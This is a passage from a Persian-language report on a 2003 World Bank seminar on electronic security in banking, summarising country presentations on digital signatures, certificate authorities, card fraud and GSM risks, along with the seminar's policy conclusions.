ﻗﺎﻧﻮﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﭼﺎﻟﺸﻬﺎﻳﻲ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ،ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺻﻨﻌﺖ ﺑﺎﻧﻜﻲ ﺍﺳﺘﻔﺎﺩﺓ ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻲﺷﻮﺩ .ﺍﻣﺎ ﺍﻳﻦ ﺩﺭ ﻣﻮﺭﺩ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻭﺍﺳﻄﻪﺍﻱ )ﺩﻻﻟﻬﺎ( ﺻﺎﺩﻕ ﻧﻴﺴﺖ :ﺍﺯ ۳۶ ﻣﺆﺳﺴﺔ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺗﻨﻬﺎ ﭼﻬﺎﺭ ﻣﺆﺳـﺴﻪ ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻـﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻨﺪ .ﺩﻭ ﺩﻟﻴﻞ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺍﻳـﻦ ﺍﻣـﺮ ﺑـﺮ ﺷﻤﺮﺩ: .۱ ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺩﺭ ﺳـﺎﻝ - ۱۹۹۷ﺩﻭ ﺳـﺎﻝ ﭘـﻴﺶ ﺍﺯ ﺗﺼﻮﻳﺐ ﻗﺎﻧﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ -ﺷﺮﻭﻉ ﺷﺪ .ﻟـﺬﺍ ﺍﻳـﻦ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺒﻞ ﺍﺯ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻥ ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ، ﻣﺸﻜﻠﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻧﺪﺍﺷﺘﻨﺪ. .۲ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺗﺄﺧﻴﺮ ﺩﺭ ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻼﺕ ﺍﻳﻤﻦ ﺷﻮﺩ ،ﺍﻣﺎ ﻣﺸﺘﺮﻳﺎﻥ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺩﺭ ﺗﺠﺎﺭﺕ ﺩﭼﺎﺭ ﺗﺄﺧﻴﺮ ﻳﺎ ﮔﺮﻓﺘﺎﺭ ﺩﺭﺩﺳﺮﻫﺎﻱ ﺩﻳﮕﺮ ﺷﻮﻧﺪ. ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻳﻚ ﺣﺎﺩﺛﺔ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻛﺮﻩ ﺑﺤﺚ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺭﺍ ﺩﮔﺮﮔـﻮﻥ ﺳـﺎﺧﺖ .ﺩﺭ ﻣـﺎﻩ 231 Certification Authorities 232 Korean Information Security Agency ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺳﻨﮕﺎﭘﻮﺭ ﺑﻨﺎ ﺩﺍﺷﺖ ﺩﺭ ﺑﻬﺎﺭ ﺳﺎﻝ ۲۰۰۳ﺧﻂﻣﺸﻲﻫﺎﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ﺧﻮﺩ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﻨﺪ .ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑـﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﻣﻔﻴﺪ ﺻﻨﻌﺖ ،ﺑﺎ ﻛﻤﻚ ﻧﻬﺎﺩﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ ،ﻭ ﺑﺮ ﻣﺒﻨﺎﻱ ﭼﻜﻴﺪﺓ ﺟﻠﺴﺎﺕ ﻣﺨﺘﻠﻒ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎﻱ ﻓﻌﺎﻝ ﺻـﻨﻌﺘﻲ ﻭ ﻣﻘﺎﻣﺎﺕ ﺩﻭﻟﺘﻲ ﻫﺪﺍﻳﺖ ﻣﻲ ﺷﻮﺩ .ﻳﻜـﻲ ﺍﺯ ﭘﺮﺳـﺸﻬﺎﻱ ﺍﺻـﻠﻲ ﺳﻨﮕﺎﭘﻮﺭ ﻛﻪ ﺩﺍﺭﺍﻱ ﺗﻨﻬـﺎ ﻳـﻚ ﻧﻬـﺎﺩ ﺑـﺮﺍﻱ ﺗـﺪﻭﻳﻦ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﻭ ﻣﻲﺑﺎﺷﺪ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﭼﮕﻮﻧﻪ ﺩﻭﻟﺘﻲ ﺑﻪ ﺑﺰﺭﮔ ﹺ ﺑﺎ ﺩﺍﺷﺘﻦ ﻣﺮﺍﺟﻊ ﻣﺘﻌﺪﺩ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﺳﺎﺯﻱ ،ﻣﻲﺗﻮﺍﻧﺪ ﺿﻮﺍﺑﻂ ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﻳﻜﭙﺎﺭﭼﻪ ﺍﻋﻤﺎﻝ ﻛﻨﺪ. ﻓﻴﻠﻴﭙﻴﻦ ﺑﺤﺚ ﻓﻴﻠﻴﭙﻴﻦ ﺭﻭﻱ ﻧﺘﺎﻳﺞ ﺳﻪ ﻧﮕـﺮﺵ ﻣﻤﻜـﻦ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺭﺷـﺪ ﻓﺰﺍﻳﻨﺪﺓ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﻣﺘﻤﺮﻛﺰ ﺑﻮﺩ .ﺍﻳﻦ ﺳـﻪ ﻧﮕـﺮﺵ ﻋﺒﺎﺭﺕ ﺑﻮﺩﻧﺪ ﺍﺯ ﮔﺴﺘﺮﺵ ﻭﻳﺮﻭﺳﻬﺎ )ﻣﺜـﻞ ﻭﻳـﺮﻭﺱ ،(I Love You ﺳﺮﻗﺖ ﻣﺪﺍﻭﻡ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ،ﻭ ﻧﻴﺰ ﺣﺎﺩﺛﺔ ﻳﺎﺯﺩﻫﻢ ﺳـﭙﺘﺎﻣﺒﺮ. 
ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﻛـﺸﻮﺭ ﻓﻴﻠﻴﭙـﻴﻦ ﺍﺯ ﺣﺎﺩﺛـﺔ ﻳـﺎﺯﺩﻫﻢ ﺳـﭙﺘﺎﻣﺒﺮ ﺑـﺮﺍﻱ ﺗﺸﺮﻳﺢ ﻣﺤﺎﺳﺒﺎﺕ ﺩﻭﻟﺖ ﺧﻮﺩ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ﻣﻠـﻲ ﺍﻗﺘﺼﺎﺩﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻧﺪ. ﺩﺭ ﻓﻴﻠﻴﭙــﻴﻦ ،ﮔــﺴﺘﺮﺵ ﻭﻳــﺮﻭﺱ " "I Love Youﺑــﺴﺮﻋﺖ ﻧﻬﺎﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﺑـﻪ ﻭﺍﻛـﻨﺶ ﻭﺍﺩﺍﺭ ﻛـﺮﺩ .ﺍﻳـﻦ ﺣﺎﺩﺛـﻪ ﺍﺯ ﺁﻥ ﺟﻬــﺖ ﻛــﻪ ﺿــﻌﻔﻬﺎﻱ ﺩﻭﻟــﺖ ﻭ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﺭﺍ ﻓــﺎﺵ ﻣــﻲﺳــﺎﺧﺖ ﺍﺯ ﺍﻫﻤﻴــﺖ ﻭﻳــﮋﻩﺍﻱ ﺑﺮﺧــﻮﺭﺩﺍﺭ ﺑــﻮﺩ .ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ 233 Licensed Certificate Authorities ﻲ ﻓﻬﻢ ﻭ ﻭﺍﻛﻨﺶ ﻣﺆﺛﺮ ﺑﻪ ﺣﻮﺍﺩﺙ ﻫﻤﭽﻨﻴﻦ ﻇﺮﻓﻴﺖ ﻗﺪﺭﺕ ﻗﺎﻧﻮﻧ ﹺ ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺑﻪ ﻣﻨﺼﺔ ﻇﻬﻮﺭ ﺭﺳـﺎﻧﺪ ﻭ ﺩﺭ ﻧﺘﻴﺠـﺔ ﻳـﻚ ﺑﺮﻧﺎﻣﺔ ﺁﻣﻮﺯﺵ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺩﻭﻟﺖ ﺑﻪ ﺍﺟﺮﺍ ﮔﺬﺍﺷﺘﻪ ﺷﺪ ﻭ ﺩﻭﻟﺖ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺩﺭ ﺍﻳﻦ ﻋﺮﺻﻪ ﻗﻮﺍﻧﻴﻦ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺳﺎﻳﺒﺮ ٢٣٤ﺭﺍ ﺍﺯ ﺩﺍﻳﺮﺓ ﺗﺼﻮﻳﺐ ﮔﺬﺭﺍﻧﺪ. ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺩﺭ ﺣـﻮﺯﺓ ﺧـﺪﻣﺎﺕ ﻞ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﻴﻠﻴﭙﻴﻦ )ﻣﺜﻞ ﻫﺮ ﻛﺸﻮﺭ ﺩﻳﮕﺮﻱ( ﺑﻪ ﻳﻚ ﻣﻌـﻀ ﹺ ﺍﺳﺎﺳﻲ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻳـﻦ ﻛـﺸﻮﺭ ﺩﺍﺭﺍﻱ ۲ﺗـﺎ ۳ﻣﻴﻠﻴـﻮﻥ ﺩﺍﺭﻧــﺪﺓ ﻛــﺎﺭﺕ ﺍﻋﺘﺒــﺎﺭﻱ ﺍﺳــﺖ ﻭ ﺣــﺪﻭﺩ ۱۷ﺑﺎﻧــﻚ ،ﺧــﺪﻣﺎﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺍﻳﻦ ﻛﺎﺭﺗﻬﺎ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﻭ ﺩﺭ ﺳﺎﻝ ﭼﻨﺪﻳﻦ ﻣﻴﻠﻴـﻮﻥ ﺗﺒﺎﺩﻝ ﺗﺠﺎﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻧﺠﺎﻡ ﻣﻲ ﺷﻮﺩ .ﺗﺨﻤﻴﻦ ﺯﺩﻩ ﺷﺪﻩ ﻛﻪ ﺣﺪﻭﺩ ۴۰۰ﻣﻴﻠﻴﻮﻥ ﭘﺰﻭ )ﻣﻌﺎﺩﻝ ۸ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺁﻣﺮﻳﻜﺎ( ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺎﻟﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎﻱ ﺻﻮﺭﺕﮔﺮﻓﺘﻪ ﺍﺯ ﻛﺎﺭﺗﻬـﺎﻱ ﺍﻋﺘﺒــﺎﺭﻱ ﻧــﺴﺒﺖ ﺩﺍﺩ .ﺩﺳــﺘﮕﺎﻫﻬﺎﻱ ﺧــﻮﺩﭘﺮﺩﺍﺯ ﻧﻴــﺰ ﺑﻄــﻮﺭ ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻫـﺴﺘﻨﺪ ﻭ ﺩﺭ ﺳﺮﺍﺳـﺮ ﻛـﺸﻮﺭ ﭼﻴـﺰﻱ ﺣﺪﻭﺩ ۱۰ﻣﻴﻠﻴﻮﻥ ﻣﺸﺘﺮﻱ ﺩﺍﺭﻧﺪ. ﺳﻮﻣﻴﻦ ﻣﻮﺿﻮﻉ ﺑﺤﺚ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻳـﺎﺯﺩﻫﻢ ﺳـﭙﺘﺎﻣﺒﺮ ﺑﺎﻧﻜﻬـﺎ ﺭﺍ ﻣﺠﺒﻮﺭ ﺳﺎﺧﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﻪ ﺗـﻼﺵ ﺟﻬﺖ ﺍﻓﺰﺍﻳﺶ ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻛﺸﻮﺭﻫﺎﻱ ﺩﻳﮕﺮ ﺑﭙﺮﺩﺍﺯﻧﺪ. 
ﻫﻤﺎﻧﻨﺪ ﺳﺎﻳﺮ ﻧﻘﺎﻁ ﺟﻬﺎﻥ ،ﺍﻗﺘﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﻴﻠﻴﭙﻴﻦ ﻫﻢ ﻫﻨﻮﺯ ﺩﺭ ﻣﺮﺍﺣﻞ ﺍﻭﻟﻴﺔ ﺗﻮﺳﻌﻪ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ .ﻓﻴﻠﻴﭙـﻴﻦ ﺩﺭ ﺍﻳـﻦ ﺭﺍﺳـﺘﺎ ﺑـﻪ ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﻫﺸﺖ ﺭﻛﻦ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻧﻴﺰ ﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ :ﭘﻴﻮﻧﺪ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﺑـﺎ ﺭﻭﺷﻬﺎﻱ ﺍﻋﻤﺎﻝ ﺿـﻮﺍﺑﻂ ،ﺑﺮﻗـﺮﺍﺭﻱ ﻫﻤﻜـﺎﺭﻱ ﻣﻴـﺎﻥ ﺩﻭﻟـﺖ ﻭ ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ،ﻭ ﻧﻴﺰ ﺑﻬﺒﻮﺩ ﺗﻮﺍﻧﺎﻳﻴﻬﺎﻱ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺩﺭ ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ .ﺑﺎ ﺍﻳﻨﻬﻤﻪ ﻓﻴﻠﻴﭙﻴﻦ ﻫﻨـﻮﺯ ﻧﻴﺎﺯﻣﻨـﺪ ﻛﺎﺭﺷﻨﺎﺳــﺎﻥ ﺧﺒــﺮﺓ ﻗــﺎﻧﻮﻧﻲ ،ﺑﺨــﺼﻮﺹ ﺑــﺮﺍﻱ ﺩﺍﺩﮔﺎﻫﻬــﺎﻱ ﺗﺨﺼﺼﻲ ﺍﺳﺖ .ﺍﺯ ﺩﻳﮕﺮ ﻧﻴﺎﺯﻫـﺎﻱ ﺍﻳـﻦ ﻛـﺸﻮﺭ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﻭ ﺁﻣﻮﺯﺵ ﻛﻠﻴﺔ ﺍﻓﺮﺍﺩ ﺩﺭﮔﻴﺮ ﺩﺭ ﺣـﻮﺯﺓ ﺧـﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺷﺎﻣﻞ ﻣﺸﺘﺮﻳﺎﻥ ،ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ،ﻭ ﺷـﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﺓ ﺧﺪﻣﺎﺕ ﺍﺷﺎﺭﻩ ﻛﺮﺩ. ﻓﻴﻠﻴﭙﻴﻨﻲ ﻫﺎ ﺩﻭ ﺳﺆﺍﻝ ﻋﻤﺪﻩ ﻣﻄﺮﺡ ﻛﺮﺩﻧـﺪ (۱ :ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﭼﮕﻮﻧﻪ ﻣﻴﺎﻥ ﮔﺰﺍﺭﺵ ﺭﻭﻳﺪﺍﺩﻫﺎ ﻭ ﺣﻔﻆ ﻣﺴﺎﺋﻞ ﻣﺤﺮﻣﺎﻧﻪ ،ﺗـﻮﺍﺯﻥ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩﻩ ﺍﺳﺖ؟ ﻭ (۲ﺟﺎﻳﮕﺎﻩ ﭘﻠـﻴﺲ ﺑـﻴﻦﺍﻟﻤﻠـﻞ ﺩﺭ ﻗـﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺟﺰﺍﻳﻲ ﭼﻴﺴﺖ؟ 234 Cyber-Strategy ﺑﺨﺶ ﺳﻮﻡ ﺁﮔﻮﺳــﺖ ﺳــﺎﻝ ﮔﺬﺷــﺘﻪ ﭼﻨــﺪ ﺷــﺮﻛﺖ ﻭﺍﺳــﻄﻪﺍﻱ ﺣــﺴﺎﺑﻬﺎﻱ ﻏﻴﺮﻓﻌــﺎﻝ ﻭ ﻣــﺴﻜﻮﺗﻲ ﺭﺍ ﻳﺎﻓﺘﻨــﺪ ﻛــﻪ ﺗﻨﻬــﺎ ﺑﻌﻨــﻮﺍﻥ ﺑﺨــﺸﻲ ﺍﺯ ﻛﺎﺭﻫــﺎﻱ ﺧــﻮﺩ ﺣــﺪﻭﺩ ۲۰ﻣﻴﻠﻴــﻮﻥ ﺩﻻﺭ ﺁﻣﺮﻳﻜــﺎ ﺳــﻬﺎﻡ ﺍﺯ ﺳـﺮﻣﺎﻳﻪﮔــﺬﺍﺭﺍﻥ ﺧﺮﻳـﺪﻩ ﺑﻮﺩﻧــﺪ .ﺩﺭ ﻭﺍﻛــﻨﺶ ﺑـﻪ ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ، ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺍﻓـﺰﺍﻳﺶ ﻳﺎﻓـﺖ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺟﺒﺎﺭ ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﭘﻴﺪﺍ ﻛﺮﺩ .ﺩﺭ ﺍﻭﻝ ﺩﺳﺎﻣﺒﺮ ﺳﺎﻝ ،۲۰۰۲ﮔﻮﺍﻫﻲﻫﺎﻱ ﺧﺼﻮﺻﻲ "ﻓﺎﻗﺪ ﺍﻋﺘﺒـﺎﺭ" ﺍﻋـﻼﻡ ﺷـﺪﻧﺪ ﻭ ﺍﺯ ﺁﻥ ﭘﺲ ﺗﻨﻬﺎ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻣﺮﺍﻛﺰ ﺗﺄﻳﻴﺪﺷﺪﺓ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ) ٢٣٣(LCAsﺻﺎﺩﺭ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﻣﻌﺘﺒﺮ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻣﺪﻧﺪ ﻭ ﺗﺎ ﻣﺎﻩ ﻣﻲ ﺳﺎﻝ ۲۰۰۳ﻧﻴﺰ ﻫﻤﺔ ﮔﻮﺍﻫﻲﻫﺎ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻣﺠﺪﺩ ﻗـﺮﺍﺭ ﻣﻲ ﮔﺮﻓﺘﻨﺪ .ﺿﺮﻭﺭﻱ ﺷـﺪ ﻛـﻪ ﻫﻤـﺔ ﺷـﺮﻛﺘﻬﺎﻱ ﻭﺍﺳـﻄﻪﺍﻱ ﺍﺯ ﻧﻮﺍﻣﺒﺮ ۲۰۰۲ﻭ ﻣﺆﺳﺴﺎﺕ ﻛﻮﭼﻜﺘﺮ ﺍﺯ ﮊﺍﻧﻮﻳﻪ ۲۰۰۳ﺑـﻪ ﺑﻌـﺪ ،ﺩﺭ ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﻛﺰ ﺗﺄﻳﻴﺪﺷﺪﺓ ﺻﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ. 
Sri Lanka

The representatives of Sri Lanka began by giving some background on the electronic economy and discussing the limits on raising security awareness among Internet users. They believed that the problems of expanding connectivity would soon be solved, and that the lack of awareness exists mostly at management level, which is why it is very difficult to win support in areas such as the expansion of connectivity. Another weakness, found among customers, is a lack of awareness of how to carry out a secure Internet transaction. As a result, trust among customers has fallen and they are less willing to take part in Internet transactions. Creating policies and codes of practice and providing them to service providers can also help to build customer trust.

Question

Sri Lanka's question concerned Internet service providers. They wanted to know whether there will be official guidelines and codes of practice for ISPs in the area of e-security. They also asked for information about Korea's security agency: whether it is private or governmental, and which roles it covers.

Bulgaria

Modern banking services in Bulgaria were launched in 1989 with a culture similar to that of the United States and Europe. These services included payment systems and software packages specific to the banking industry (BANKNET is one example). Bulgaria began its security measures with basic questions about "what must be protected", and then identified the critical elements of this work, such as physical networks, internal information systems, and data protection applications (especially for data exchanged between banks and customers).
On the organisational side, Bulgaria had an internal committee responsible for analysis and for proposing solutions. Drawing up e-security policies requires oversight of communication networks and their use, which involves up-to-date software and hardware and a list of specific and complex activities. The Bulgarians regard the security of payment systems as critical. The country's supervisory and preventive changes also include training, one of the important components of Bulgaria's security plan. They also pointed out that work must continue on the legal and administrative foundations of this issue (including technical agreements between the subscribers of different networks).

Bulgaria has a legal framework for electronic signatures that covers the electronic document law, the regulation of the legal activities of certificate authorities, and the requirements for advanced electronic signatures. Banks are currently inclined to set up a PKI, and they want to take on the role of certificate authority in specific applications of this system. There is therefore a need for internal flexibility and for the use of technologies that are compatible between banks. Bulgaria also has a particular consideration in the area of security policy: in addition to defining business needs, the policy must also define reliability. Implementing the concept of the electronic signature and putting it to general use is difficult in many activities. The key factors in Bulgaria's payment systems are the vendor, reliability, and price.

Banking services sit in a protected zone, and this protection includes a dedicated gateway for each application as well as a firewall. The BANKNET software package makes it possible to access banks over the Internet. Many attacks against websites and e-mail servers happen because these can be reached over the Internet. Behind a firewall, however, an adequate level of security is provided for banking services and interbank applications.
In Bulgaria, as anywhere else, central banks enact legal frameworks for electronic payment systems. These frameworks usually cover new payment methods and the rules that govern national payment systems. In this way new legal foundations are created for national payment systems, including central payment systems and card systems. Bulgaria concluded that currency has become problematic because of the strict conditions on bank balances. They have a question about the role of oversight in the e-security of payment systems, and want to know whether stricter oversight should be applied to these systems or not. Brazil and South Africa, for example, have strict methods for overseeing payment systems and believe that they have designed an efficient and competitive system. In some circumstances regulations can become a monopoly factor for retail systems and prevent them from operating, so regulatory documents should also include careful assessments of how technologies affect retail systems.

Conclusions of the 2003 global seminar: electronic safety and soundness [235]

In view of the ever-growing risks, this meeting recalled the importance of attending to e-security issues in a global framework. When reporting procedures are disorderly, every security incident can become more dangerous. Most of the information about e-security is inaccurate. In addition, worms, viruses, and other kinds of electronic threats have had serious consequences for the world's critical infrastructures.

[235] This session was held with members of the World Bank Integrator Group present. The members attending were Thomas Glaessner, Tom Kellerman, and Valerie McNevin, together with participants in this global seminar from Brazil, Chile, Colombia, Mexico, Saudi Arabia, Ukraine, Australia, China (Beijing), China (Hong Kong), Malaysia, the Philippines, Singapore, and Sri Lanka.
The original documents of these meetings are available at the following address: http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&ESecurity/E-Finance&Presentations

Mitigating e-security risks: a combination of soft and hard infrastructure

One possible definition of e-security is "any tool, technique, or process that protects a system's information assets against threats to their confidentiality, integrity, or availability". E-security is made up of two infrastructures: the soft infrastructure, comprising policies, procedures, processes, and protocols; and the hard infrastructure, comprising hardware and software. Growing dependence on technology raises the likelihood of threats and sometimes widens their effects and the damage they cause. On the other hand, as we saw earlier, organised and sometimes terrorist activity is increasing the speed and severity of attacks. All of these combine to make risk mitigation one of the most important parts of an ideal and effective security plan.

The expansion of e-security programmes faces major challenges for several reasons:

First, security activities are usually expected to be reactive rather than proactive. This view has to change so that current and future threats can be fought actively and continuously.

Second, international cooperation is particularly important, especially for law enforcement organisations and supervisors; yet we know that even within a single country, cooperation between domestic organisations can be complicated.

All the participating countries stressed the need for broad, cross-sector training in e-security, and in the end the World Bank Integrator Group took on responsibility for providing best-practice reports and holding seminars on electronic risk mitigation.

E-security problems usually consist of a shortage of trained security teams, a lack of efficient government processes for verification, and growing technologies such as mobile communications.
The pillars of information technology are growing rapidly, and because cyber threats and vulnerabilities are spreading at the same speed, billions of dollars of capital are at risk. The aim of the international dialogues is not to examine why security breaches occur, but to establish what can be done to solve the problems.

Third, the failure to report incidents is a serious obstacle to understanding the extent of the existing threats, because there is still considerable reluctance to report security breaches publicly.

Fourth, in addition to the institutions' lack of interest in reporting incidents, the time taken to respond to incidents is also long in many cases.

Finally, staff continue to play a pivotal role, and a single inexperienced user can undermine the security of the whole network; it is therefore necessary to raise everyone's awareness of the threats. If electronic threats are not managed properly, public trust in technology will inevitably be damaged. With these points in mind, several further steps must be taken to reach higher levels of e-security:

First, regulators, financial institutions, and other market participants must work to identify and spread best practices in e-security.

Second, cooperation must become routine and permanent, with particular attention to removing the key threats facing organisations and customers in general.

Third, providing training to staff and to security auditors must be a high priority in business and government activity. The definition and practical scope of risk must cover the kinds of cyber risk in addition to the traditional forms of information and physical threats.

Oversight of information security and technology risk

As the information technology sector grows beyond the limits of local capabilities and talent, turning to external resources to provide security has become common practice, and the use of international resources for this purpose in particular has created both threats and opportunities for organisations around the world.
The activities carried out in recent years to reduce electronic threats can be regarded as a compulsory benefit for banks: they oblige banks to draw up a response programme for protecting customer data against threats, and along the way they also give banks all the guidance they need. Such a programme must also take into account the processes for informing customers of incidents in which information has been disclosed without authorisation.

Despite complex and innovative policies and procedures, security has still not become a simple matter, and so continuous vigilance and training remain necessary. Some of the newer areas of security that currently call for more attention are vulnerability assessment, penetration testing, intrusion detection systems, and cybercrime laws.

Mobile technologies: new achievements and risks

In 2002 GSM had about 787 million users worldwide. Wireless technology is growing at three times the rate of fixed lines. Like other communication technologies, it is vulnerable to malicious code such as Trojans and viruses and to denial-of-service attacks. In the hostile environment of the Internet, wireless technology is regarded as the Achilles heel of security. The wireless connection is usually considered the weakest link in the security chain. The vulnerabilities of GSM are the vulnerability of the SIM card, SMS bombing, WAP vulnerabilities, and the attack known as "man in the middle" [236].

[236] In this type of attack a modified mobile phone presents itself to other mobile phones as a fake base station, and in this way the attacker can steal information. Information at the gateways is entirely in the clear, without any encryption, and this exposes users and their information to major vulnerabilities.

Although GSM technology cannot be made completely secure, a user can protect himself far better with a few simple steps:

• enabling the power-on password;
• installing antivirus software;
• installing a personal firewall with encryption capability;
• making sure that devices are kept safely, and protecting applications with passwords;
• installing VPN software. In the case of smart cards, too, third parties must not manage PINs.

Addresses by the country representatives

During this global meeting the representatives of all the countries were asked to answer the following three questions:

